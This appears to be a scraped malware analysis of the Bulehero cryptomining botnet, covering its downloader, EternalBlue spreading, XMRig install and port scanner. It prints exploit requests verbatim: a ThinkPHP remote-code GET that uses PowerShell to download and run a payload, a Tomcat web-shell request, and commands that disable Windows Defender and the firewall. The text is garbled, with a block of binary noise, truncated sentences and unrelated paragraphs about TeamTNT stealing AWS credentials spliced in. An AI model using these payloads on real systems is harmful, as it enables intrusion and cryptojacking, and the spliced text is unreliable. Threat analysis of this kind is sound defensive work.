Below is an overview of the system activity of Download.exe.


  • Creates a process xsvinmat.exe (found in the body)
  • Creates a service {random}.exe
    • Modular Plugin Component
    • Connects to a45[.]bulehero[.]in via TCP port 1356 to send and receive some data
  • Downloads a file from a46[.]bulehero[.]in via HTTP GET /docropool.exe. It saves the file as %TEMP%\docropool.exe and executes it.
  • Docropool.exe creates a separate process of itself at C:\Windows\docropool.exe
  • C:\Windows\docropool.exe will start several processes to install a cryptominer, weaken the system, stop some Windows services and spread across the network.

MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}

GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(

new-object%20System.Net.WebClient).DownloadFile(‘http://a46[.]bulehero[.]in/download.exe’,’C:/14.exe’);start%20C:/14.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)


Installation1st Stage Payload: Download.exe The full payload is downloaded from one domain (a46[.]bulehero[.]in), in which this campaign is named.

For instance, if the machine’s public IP is, it will attempt to scan to Windows Defender and Windows Services

The Bulehero malware disables the Windows Defender service, which is typical for malware, but it also disables Windows shares probably to avoid reinfection of the system or to avoid other competing botnets to control the system.

CommandDescriptioncmd /c net stop SharedAccessDisables Internet Connection Sharing Servicecmd /c net stop MpsSvcDisables Windows Firewallcmd /c net stop WinDefendDisables Windows Defendercmd /c net stop wuauservDisables Windows Updatecmd /c net stop LanmanServerDisables Windows Sharing

Conclusion This campaign is one of several that we have seen that targets Windows servers.

The following section will detail each spreading technique.EternalBlue and DoublePulsar

This routine tries to execute the bulehero downloader on SMB ports 445 and 139 using EternalBlue exploit and DoublePulsar backdoor.

It drops the following files in C\Windows\InfusedAppe\LocalService directory:

  • AppCapture_x32.dll (32-bit bulehero bot downloader)
  • AppCapture_x64.dll (64-bit bulehero bot downloader)
  • Spoolsrv.xml (EternalBlue config)
  • Svschost.xml (DoublePulsar config)
  • Specials\spoolsrv.exe (EternalBlue Component)
  • Specials\svschost.exe (DoublePulsar Backdoor)

The following routine, essentially executes AppCapture_x32.dll on the target machine if the exploit attack is successful.

P/gϧp��Io����Ϯ�~r��%�e�RB8�U7��E��{v����n8�r�S����`L�0AT����^{�(����Q��j.����e}����O39O},vR�JN��7{ay�[���;�=�����~`W�O:��3?nIZ���2��./�iKV^�y��ê��@?�oE����O�� T}����6W�l���y���[�W ݍ�#�?+}w*’kм6M��A&�b���7���0+�WjvWVv�ٷc�<��ٜ�i�{���� 2]�T�dv�`��g*�*�~�֥�[�3O{le��ޘF�sة�Y�Y�А�?!��8�PLbDɝ�LJr��~&{(*�،ri5Ƹt�Z���)�]�vd�?|����w�<�ʅƚ”��y8H� 4s�j�w��HJ8�:V~�M+�&�XdnK�e��2��F�Óx��$3��uσ[���U�A�U1V%S�+hA;(7�0�O��Z��îx*ounm����=np�W6�0:���j#�7�Ԥ\���1�2z]YW�5��m���#M���+ɖ�߰�d���’����޻=�cE��|I�_����”�f�b��(�\r�%�ܿ;�y*�oZ?�:Uu�X}�Fs��_�aݛ���A}����� ��Y�3/f�G����V��0s�\���ʪ�R�Ģ忯�.q���v�0���&���G=�B����wMQ��A�/_f��p�0��FΎ� nf�9k/�}h�Χ����q�3�iX��Q���C�Ք�՟և@�G��w��Ω]�C�;ow�І�:�?~�t�P�#��C�(��#�d�}�j��&����?�@�w]�J���8��Z���꿛�-�y�oپ�~��� la�e�m�}�w��M��lZ�������(�������P�o�?�E~0��}w�Sn��ξ��|���wG�”�D��:��ڶ��6ni*_#7�2뢬���J��嫁�^��=��Lf�1��:�c��{�{‘����<�����8.

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}

Tomcat PUT arbitrary file upload vulnerability (CVE-2017-12615)

GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46[.]bulehero[.]in/download.exe HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Accept: text/html, application/xhtml+xml, */*

Accept-Encoding: gbk, GB2312

Accept-Language: zh-cn

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Host: {redacted}

ThinkPHP vulnerabilty

There are two types of exploits targeting this vulnerability that depend on the filepath of the web app that it is trying to exploit.

It includes the following configuration file for its mining and spreading function.














XMRig Miner

We believe that the primary goal of this campaign is to install a miner. When docropool.exe is executed, it then drops the XMRig miner file as C:\Windows\TEMP\Networks\taskmgr.exe and executes it.

They said they sent a collection of canary credentials to the TeamTNT C&C server, but none of those accounts have been accessed prior to Aug. 17, when they published their research.

Nevertheless, when the attackers decide to do so, TeamTNT stands to seriously boost its profits, either by installing crypto-mining malware in more powerful AWS EC2 clusters directly or by selling the stolen credentials on the black market.

Right now, Cado has only a limited view into TeamTNT’s operation, as the security firm has been able to track only a few of the Monero wallet addresses that the group uses to collect mined funds.

Curl is used to send the AWS credentials to TeamTNT’s server.”

Interestingly, though the script is written to be a worm, the automated portion of the attack didn’t seem to be in full operation during the security firm’s analysis.

“We sent credentials created by to TeamTNT, however have not seen them in use yet,” according to the post. “This indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn’t currently functioning.”

The script that anchors TeamTNT’s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself.

This port is commonly tied to the Oracle Weblogic vulnerability, which it exploits.


Port Scanner

To check if ports are open in the network, it uses a custom port scanner. This file is saved as C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe. It is being executed by the batch file as follows:

cd C:\Windows\InfusedAppe\Priess\

for /f “eol= tokens=1,2 delims= ” %%i in (C:\Windows\InfusedAppe\Priess\ip.txt) do GoogleCdoeUpdate.exe tcp %%i %%j 445 256 /save

Ip.txt contains a list of network segments, e.g.,
Aside from internal networks, it can also attack the external network subnet. It does this by getting the current machine’s public IP using http://2019[.]ip138[.]com/ic.asp and attacks the class C subnet of that public IP address.

Similar Posts:

Leave a comment